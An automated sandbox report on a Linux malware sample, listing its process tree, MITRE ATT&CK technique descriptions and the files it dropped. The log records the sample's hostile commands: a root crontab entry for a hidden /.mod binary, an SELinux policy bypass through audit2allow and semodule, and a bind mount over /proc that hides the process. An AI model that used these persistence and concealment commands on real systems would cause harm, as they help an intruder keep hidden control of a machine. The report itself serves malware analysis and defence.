Path:	/tmp/utZX7JAuMU.elf
Arguments:	-
File size:	5706200 bytes
MD5 hash:	02e8e39e1b46472a60d128a6da84a2b8

Chronological Activities

Analysis Process: bash PID: 5598, Parent PID: 5542

General

Start time (UTC):	03:04:53
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	/bin/bash -c "cd /boot;ausearch -c 'System.mod' --raw \| audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5603, Parent PID: 5598

General

Start time (UTC):	03:04:53
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5604, Parent PID: 5598

General

Start time (UTC):	03:04:53
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5605, Parent PID: 5598

General

Start time (UTC):	03:04:53
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: utZX7JAuMU.elf PID: 5606, Parent PID: 5542

General

Start time (UTC):	03:04:53
Start date (UTC):	02/11/2024
Path:	/tmp/utZX7JAuMU.elf
Arguments:	-
File size:	5706200 bytes
MD5 hash:	02e8e39e1b46472a60d128a6da84a2b8

Chronological Activities

Analysis Process: bash PID: 5606, Parent PID: 5542

General

Start time (UTC):	03:04:53
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	/bin/bash -c "echo \"/1 * * * root /.mod \" >> /etc/crontab"
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: utZX7JAuMU.elf PID: 5611, Parent PID: 5542

General

Start time (UTC):	03:04:54
Start date (UTC):	02/11/2024
Path:	/tmp/utZX7JAuMU.elf
Arguments:	-
File size:	5706200 bytes
MD5 hash:	02e8e39e1b46472a60d128a6da84a2b8

Chronological Activities

Analysis Process: renice PID: 5611, Parent PID: 5542

General

Start time (UTC):	03:04:54
Start date (UTC):	02/11/2024
Path:	/usr/bin/renice
Arguments:	renice -20 5542
File size:	14568 bytes
MD5 hash:	3686c936ed1df483498266a36871cb5b

Chronological Activities

Analysis Process: utZX7JAuMU.elf PID: 5616, Parent PID: 5542

General

Start time (UTC):	03:04:54
Start date (UTC):	02/11/2024
Path:	/tmp/utZX7JAuMU.elf
Arguments:	-
File size:	5706200 bytes
MD5 hash:	02e8e39e1b46472a60d128a6da84a2b8

Chronological Activities

Analysis Process: mount PID: 5616, Parent PID: 5542

General

Start time (UTC):	03:04:54
Start date (UTC):	02/11/2024
Path:	/usr/bin/mount
Arguments:	mount -o bind /tmp/ /proc/5542
File size:	55528 bytes
MD5 hash:	92b20aa8b155ecd3ba9414aa477ef565

Chronological Activities

Analysis Process: utZX7JAuMU.elf PID: 5643, Parent PID: 5542

General

Start time (UTC):	03:04:54
Start date (UTC):	02/11/2024
Path:	/tmp/utZX7JAuMU.elf
Arguments:	-
File size:	5706200 bytes
MD5 hash:	02e8e39e1b46472a60d128a6da84a2b8

Chronological Activities

Analysis Process: service PID: 5643, Parent PID: 5542

General

Start time (UTC):	03:04:54
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	service cron start
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: service PID: 5648, Parent PID: 5643

General

Start time (UTC):	03:04:54
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: basename PID: 5648, Parent PID: 5643

General

Start time (UTC):	03:04:54
Start date (UTC):	02/11/2024
Path:	/usr/bin/basename
Arguments:	basename /usr/sbin/service
File size:	39256 bytes
MD5 hash:	3283660e59f128df18bec9b96fbd4d41

Chronological Activities

Analysis Process: service PID: 5649, Parent PID: 5643

General

Start time (UTC):	03:04:54
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: basename PID: 5649, Parent PID: 5643

General

Start time (UTC):	03:04:54
Start date (UTC):	02/11/2024
Path:	/usr/bin/basename
Arguments:	basename /usr/sbin/service
File size:	39256 bytes
MD5 hash:	3283660e59f128df18bec9b96fbd4d41

Chronological Activities

Analysis Process: service PID: 5650, Parent PID: 5643

General

Start time (UTC):	03:04:54
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 5650, Parent PID: 5643

General

Start time (UTC):	03:04:54
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl --quiet is-active multi-user.target
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: service PID: 5651, Parent PID: 5643

General

Start time (UTC):	03:04:54
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: service PID: 5652, Parent PID: 5651

General

Start time (UTC):	03:04:54
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 5652, Parent PID: 5651

General

Start time (UTC):	03:04:54
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl list-unit-files --full --type=socket
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: service PID: 5653, Parent PID: 5651

General

Start time (UTC):	03:04:54
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sed PID: 5653, Parent PID: 5651

General

Start time (UTC):	03:04:54
Start date (UTC):	02/11/2024
Path:	/usr/bin/sed
Arguments:	sed -ne s/\\.socket\\s[a-z]\\s*$/.socket/p
File size:	121288 bytes
MD5 hash:	885062561f66aa1d4af4c54b9e7cc81a

Chronological Activities

Analysis Process: systemctl PID: 5643, Parent PID: 5542

General

Start time (UTC):	03:04:56
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl start cron.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: utZX7JAuMU.elf PID: 5666, Parent PID: 5542

General

Start time (UTC):	03:04:56
Start date (UTC):	02/11/2024
Path:	/tmp/utZX7JAuMU.elf
Arguments:	-
File size:	5706200 bytes
MD5 hash:	02e8e39e1b46472a60d128a6da84a2b8

Chronological Activities

Analysis Process: systemctl PID: 5666, Parent PID: 5542

General

Start time (UTC):	03:04:56
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl start crond.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: systemd PID: 5574, Parent PID: 5573

General

Start time (UTC):	03:04:52
Start date (UTC):	02/11/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 5574, Parent PID: 5573

General

Start time (UTC):	03:04:52
Start date (UTC):	02/11/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: systemd PID: 5578, Parent PID: 5577

General

Start time (UTC):	03:04:52
Start date (UTC):	02/11/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 5578, Parent PID: 5577

General

Start time (UTC):	03:04:52
Start date (UTC):	02/11/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: systemd PID: 5581, Parent PID: 1

General

Start time (UTC):	03:04:52
Start date (UTC):	02/11/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: udisksd PID: 5631, Parent PID: 803

General

Start time (UTC):	03:04:54
Start date (UTC):	02/11/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Chronological Activities

Analysis Process: dumpe2fs PID: 5631, Parent PID: 803

General

Start time (UTC):	03:04:54
Start date (UTC):	02/11/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Chronological Activities

Analysis Process: systemd PID: 5665, Parent PID: 1

General

Start time (UTC):	03:04:56
Start date (UTC):	02/11/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: cron PID: 5665, Parent PID: 1

General

Start time (UTC):	03:04:56
Start date (UTC):	02/11/2024
Path:	/usr/sbin/cron
Arguments:	/usr/sbin/cron -f
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 5676, Parent PID: 5665

General

Start time (UTC):	03:05:01
Start date (UTC):	02/11/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 5684, Parent PID: 5676

General

Start time (UTC):	03:05:02
Start date (UTC):	02/11/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: sh PID: 5684, Parent PID: 5676

General

Start time (UTC):	03:05:02
Start date (UTC):	02/11/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "/.mod "
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5685, Parent PID: 5684

General

Start time (UTC):	03:05:02
Start date (UTC):	02/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: .mod PID: 5685, Parent PID: 5684

General

Start time (UTC):	03:05:02
Start date (UTC):	02/11/2024
Path:	/.mod
Arguments:	/.mod
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: .mod PID: 5686, Parent PID: 5685

General

Start time (UTC):	03:05:02
Start date (UTC):	02/11/2024
Path:	/.mod
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: systemd PID: 5704, Parent PID: 1

General

Start time (UTC):	03:05:02
Start date (UTC):	02/11/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: cron PID: 5704, Parent PID: 1

General

Start time (UTC):	03:05:02
Start date (UTC):	02/11/2024
Path:	/usr/sbin/cron
Arguments:	/usr/sbin/cron -f
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 5755, Parent PID: 5704

General

Start time (UTC):	03:06:01
Start date (UTC):	02/11/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 5762, Parent PID: 5755

General

Start time (UTC):	03:06:01
Start date (UTC):	02/11/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: sh PID: 5762, Parent PID: 5755

General

Start time (UTC):	03:06:01
Start date (UTC):	02/11/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "/.mod "
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5763, Parent PID: 5762

General

Start time (UTC):	03:06:01
Start date (UTC):	02/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: .mod PID: 5763, Parent PID: 5762

General

Start time (UTC):	03:06:01
Start date (UTC):	02/11/2024
Path:	/.mod
Arguments:	/.mod
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: .mod PID: 5764, Parent PID: 5763

General

Start time (UTC):	03:06:01
Start date (UTC):	02/11/2024
Path:	/.mod
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: systemd PID: 5784, Parent PID: 1

General

Start time (UTC):	03:06:01
Start date (UTC):	02/11/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: cron PID: 5784, Parent PID: 1

General

Start time (UTC):	03:06:01
Start date (UTC):	02/11/2024
Path:	/usr/sbin/cron
Arguments:	/usr/sbin/cron -f
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Creation, File: File Metadata, File: File Modification, Firmware: Firmware Modification, Process: OS API Execution, Process: Process Creation, Script: Script Execution, Service: Service Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report utZX7JAuMU.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/.mod

/etc/.walk

/etc/32676

/etc/crontab

/etc/init.d/acpid

/etc/init.d/alsa-utils

/etc/init.d/anacron

/etc/init.d/apparmor

/etc/init.d/apport

/etc/init.d/avahi-daemon

/etc/init.d/binfmt-support

/etc/init.d/bluetooth

/etc/init.d/console-setup.sh

/etc/init.d/cron

/etc/init.d/cryptdisks

/etc/init.d/cryptdisks-early

/etc/init.d/cups

/etc/init.d/cups-browsed

/etc/init.d/dbus

/etc/init.d/gdm3

/etc/init.d/hddtemp

/etc/init.d/hwclock.sh

/etc/init.d/irqbalance

/etc/init.d/iscsid

/etc/init.d/keyboard-setup.sh

/etc/init.d/kmod

/etc/init.d/lightdm

/etc/init.d/lm-sensors

/etc/init.d/lvm2-lvmpolld

/etc/init.d/mono-xsp4

/etc/init.d/multipath-tools

/etc/init.d/open-iscsi

Linux Analysis Report
utZX7JAuMU.elf